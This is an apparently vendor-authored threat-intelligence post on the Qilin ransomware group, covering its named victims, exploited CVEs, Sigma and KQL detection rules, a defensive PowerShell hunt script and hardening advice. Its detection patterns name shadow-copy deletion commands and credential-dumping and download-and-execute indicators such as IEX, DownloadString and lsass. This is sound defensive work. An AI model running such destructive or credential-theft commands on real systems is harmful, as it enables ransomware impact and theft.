Back to Intelligence

QILIN Ransomware Gang: 18 New Victims Posted — High-Volume Attacks on Business & Financial Sectors

SA
Security Arsenal Team
May 24, 2026
6 min read

Aliases: Agenda, Titan RaaS Model: Ransomware-as-a-Service (RaaS) with an affiliate-driven model. Typical Ransom Demands: Variable, ranging from $500k to multi-million dollars depending on victim revenue, strictly enforced via double extortion (data leak + encryption). Initial Access Vectors: Qilin affiliates are versatile but currently heavily favoring exploitation of internet-facing applications (e.g., ConnectWise ScreenConnect, SmarterMail, Microsoft Exchange) and valid credentials obtained via phishing. They also leverage vulnerable VPN appliances. Double Extortion: Standard practice. Victims are given a short timeline to pay before data is published on their .onion site. Average Dwell Time: 3–7 days. Qilin affiliates move quickly laterally once initial access is established, often disabling defenses within 24 hours of breach.

Current Campaign Analysis

Sector Targeting: Based on the last 100 postings, Qilin has diversified significantly but maintains a heavy focus on Business Services (Alpert Slobin & Rubenstein, Global Retool Group, Porter W Yett, WNS Lowery) and Consumer Services. Notably, they have hit critical infrastructure adjacent sectors like Financial Services (ExpoCredit) and Technology (Semgrep).

Geographic Concentration:

  • Primary: United States (Sponseller Group, Semgrep, Snyder Packaging) and United Kingdom (Global Retool Group, Hamer Childs).
  • Secondary: Australia, New Zealand, Czech Republic, Austria.

Victim Profile: The victims range from mid-market enterprises (revenue $50M–$500M) to large entities. The inclusion of law firms (Alpert Slobin) and tech companies (Semgrep) suggests affiliates are specifically hunting for high-value intellectual property and sensitive client data to maximize extortion leverage.

Posting Frequency & Escalation: Qilin is maintaining a high tempo of operations, with 4–5 victims posted daily on average. The recent cluster (May 20–24) indicates a massive exploitation wave, likely linked to the widespread availability of exploits for the CVEs listed below.

CVE Connection: There is a strong correlation between the recent victim surge and the exploitation of:

  • CVE-2024-1708 (ConnectWise ScreenConnect): A critical path traversal vulnerability allowing RCE. This is a primary vector for Qilin affiliates targeting managed service providers (MSPs) and business services.
  • SmarterMail Vulnerabilities (CVE-2025-52691, CVE-2026-23760): The targeting of legal and business services firms suggests email server exploitation is a significant entry point in this campaign.

Detection Engineering

The following detection rules and hunt queries are designed to identify the specific TTPs observed in Qilin's recent campaign, specifically focusing on the exploitation of internet-facing applications and lateral movement preparation.

Sigma Rules

YAML
---
title: Potential ConnectWise ScreenConnect Authentication Bypass (CVE-2024-1708)
id: 4c775b9c-1f2e-4a9a-8b3c-1d2e3f4a5b6c
description: Detects potential exploitation of CVE-2024-1708 via suspicious patterns in ScreenConnect web logs.
author: Security Arsenal Research
date: 2026/05/24
modified: 2026/05/24
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2024.1708
logsource:
  category: web
detection:
  selection:
    cs-uri-query|contains:
      - 'WebService.ashx'
      - 'Host='
  condition: selection
falsepositives:
  - Legitimate administrative access
level: critical
---
title: SmarterMail Suspicious File Upload Activity (CVE-2025-52691)
id: d8e4f3a2-1b3c-4d5e-6f7a-8b9c0d1e2f3a
description: Detects potential exploitation of SmarterMail unrestricted file upload vulnerability.
author: Security Arsenal Research
date: 2026/05/24
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.52691
logsource:
  category: web
detection:
  selection:
    cs-uri-stem|contains: '/mail.aspx'
    cs-method: POST
    cs-uri-query|contains:
      - '.aspx'
      - '.ashx'
  filter:
    sc-status: 200
  condition: selection and filter
falsepositives:
  - Legitimate user file attachments
level: high
---
title: Qilin Ransomware Pre-Encryption Shadow Copy Deletion
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects commands used by Qilin affiliates to delete Volume Shadow Copies to prevent recovery.
author: Security Arsenal Research
date: 2026/05/24
status: experimental
tags:
  - attack.impact
  - attack.t1490
logsource:
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\vssadmin.exe'
      - '\wmic.exe'
    CommandLine|contains:
      - 'delete shadows'
      - 'shadowcopy delete'
  condition: selection
falsepositives:
  - System administrator maintenance
level: critical

KQL Hunt Query (Microsoft Sentinel)

Hunt for lateral movement and credential dumping attempts often seen prior to Qilin encryption.

KQL — Microsoft Sentinel / Defender
let TimeFrame = 1h;
DeviceProcessEvents
| where Timestamp > ago(TimeFrame)
// Look for tools used for lateral movement and recon
| where ProcessName in~ ("powershell.exe", "cmd.exe", "powershell_ise.exe", "wmic.exe", "psexec.exe", "psexec64.exe", "procdump.exe", "rundll32.exe")
// Filter for suspicious arguments associated with Qilin playbook
| where ProcessCommandLine has "New-Object" or 
   ProcessCommandLine has "DownloadString" or 
   ProcessCommandLine has "IEX" or
   ProcessCommandLine has "reg save" or
   ProcessCommandLine has "lsass"
// Exclude common admin activity (tuning required)
| where InitiatingProcessFileName !in~ ("explorer.exe", "services.exe")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, FolderPath
| order by Timestamp desc

Rapid-Response Hardening Script

Use this PowerShell script to enumerate scheduled tasks added in the last 7 days (persistence check) and check for exposed RDP/WinRM sessions, which Qilin uses for lateral movement.

PowerShell
# Qilin Persistence & Exposure Hunt
Write-Host "Checking for Scheduled Tasks created in last 7 days..." -ForegroundColor Cyan
$dateThreshold = (Get-Date).AddDays(-7)
Get-ScheduledTask | Where-Object { $_.Date -gt $dateThreshold } | Select-Object TaskName, TaskPath, Date, Author, Action

Write-Host "Checking active RDP sessions..." -ForegroundColor Cyan
query session

Write-Host "Checking for recent modifications to Volume Shadow Copy Service..." -ForegroundColor Cyan
Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='VSS'; StartTime=$dateThreshold} -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, LevelDisplayName, Message | Format-Table -Wrap

Write-Host "Hunt complete. Review 'Author' field in Scheduled Tasks for unknown accounts." -ForegroundColor Yellow


# Incident Response Priorities

Based on Qilin's "fast and loud" playbook:

1.  **T-Minus Detection Checklist**:
    *   **Check IIS/Mail Logs**: Immediate grep for `WebService.ashx` (ConnectWise) and `mail.aspx` anomalous POST requests.
    *   **PowerShell Logs**: Hunt for `DownloadString` or `IEX` commands originating from non-admin accounts.
    *   **Shadow Copies**: If `vssadmin.exe` is found running with `delete` arguments, encryption is imminent (minutes away).

2.  **Critical Assets for Exfiltration**:
    *   Qilin targets **Legal** and **Financial** data. Prioritize forensic review on file servers containing client PII, M&A data, and financial spreadsheets.

3.  **Containment Actions**:
    *   **Isolate**: Disconnect the compromised server from the network immediately; do not shut down (preserve RAM).
    *   **Reset**: Force reset credentials for service accounts, specifically those with access to the exploited application (e.g., Exchange, ConnectWise).
    *   **Block Firewall**: Block outbound traffic to known Tor nodes and non-standard ports on workstations immediately.

# Hardening Recommendations

**Immediate (24h)**:
*   **Patch CVE-2024-1708 (ConnectWise)**: If using ScreenConnect, apply the vendor patch immediately or restrict access to the `/Host` path via firewall/WAF until patched.
*   **Patch SmarterMail (CVE-2025-52691)**: Update to the latest secure version. Disable anonymous file uploads if not required.
*   **Disable RDP**: Close TCP 3389 from the internet. Enforce MFA for all remote access immediately.

**Short-term (2 weeks)**:
*   **Network Segmentation**: Isolate business-critical file servers from internet-facing web servers. Qilin moves laterally from the web entry point to the file server.
*   **Endpoint Detection**: Deploy behavioral rules specifically targeting PowerShell obfuscation and unusual process trees (e.g., Word spawning PowerShell spawning cmd.exe).
*   **Email Hygiene**: Implement strict filtering for macros and suspicious links, as secondary infection vectors remain active.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebransomware-gangqilinransomware-as-a-servicebusiness-servicesfinancial-servicescve-2024-1708initial-access

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action